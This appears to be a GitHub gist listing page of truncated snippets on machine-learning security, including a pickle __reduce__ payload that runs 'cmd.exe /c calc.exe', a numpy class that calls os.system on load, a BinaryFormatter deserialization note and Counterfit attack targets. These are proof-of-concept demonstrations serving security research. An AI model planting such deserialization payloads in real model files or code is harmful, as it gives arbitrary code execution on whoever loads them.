- An Internet Connection
- Docker
- VirusTotal Account (username and password)
- The following headers, which can be gathered by examining the headers in Burp or DevTools.
- X-Recaptcha-Response
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Create a class - normally this is a machine learning model saved to disk | |
class MLModel(): | |
def __reduce__(self): | |
import os | |
execution = 'cmd.exe /c calc.exe' | |
return (os.popen, (execution,)) | |
# Serialize it. | |
import pickle | |
payload = pickle.dumps(MLModel()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Enable MSMQ in "Turn Windows Features on or off" | |
// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New" | |
// There are differences between domain joined vs non queues | |
// | |
// System.Messaging.BinaryMessageFormatter | |
// public BinaryMessageFormatter() | |
// { | |
// this.formatter = new BinaryFormatter(); | |
// } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// enclave.cpp : Defines the entry point for the console application. | |
// | |
#include "stdafx.h" | |
#include "Windows.h" | |
#include "Winbase.h" | |
#include "enclaveapi.h" | |
#include <iostream> | |
#pragma comment(lib, "Kernel32.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Generated by counterfit # | |
import requests | |
import base64 | |
from counterfit.core.targets import ArtTarget | |
class Twitter(ArtTarget): | |
model_name = "twitter" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Generated by counterfit # | |
# code modified from https://github.com/monoxgas/FlyingAFalseFlag/blob/256197b78a8140d15df6e18b3221b637b5c3490a/Addendum/addendum.py | |
import os | |
import re | |
import json | |
import time | |
import requests | |
import numpy as np | |
import tqdm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import tensorflow as tf #We need tensorflow 2.x | |
import numpy as np | |
#The hashlength in bits | |
hashLength = 256 | |
def buildModel(): | |
#we can set the seed to simulate the fact that this network is known and doesn't change between runs | |
#tf.random.set_seed(42) | |
model = tf.keras.Sequential() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%%javascript | |
requirejs.config({ | |
paths: { | |
'winnner': ['//cdn.jsdelivr.net/npm/canvas-confetti@1.5.1/dist/confetti.browser.min'], | |
}, | |
}); | |
confetti({ | |
particleCount: 300, | |
startVelocity: 30, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://numpy.org/doc/stable/reference/generated/numpy.array.html | |
class ArrayExec: | |
import os | |
if os.name == 'nt': | |
os.system("calc.exe") | |
else: | |
os.system("/bin/bash") | |
def __array__(self): | |
return 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Requires fsspec. Sometimes installed, sometimes not. | |
# -- | |
# Remote | |
# python -m http.server | |
# | |
# Serving HTTP on :: port 8000 (http://[::]:8000/) | |
import pandas as pd |
OlderNewer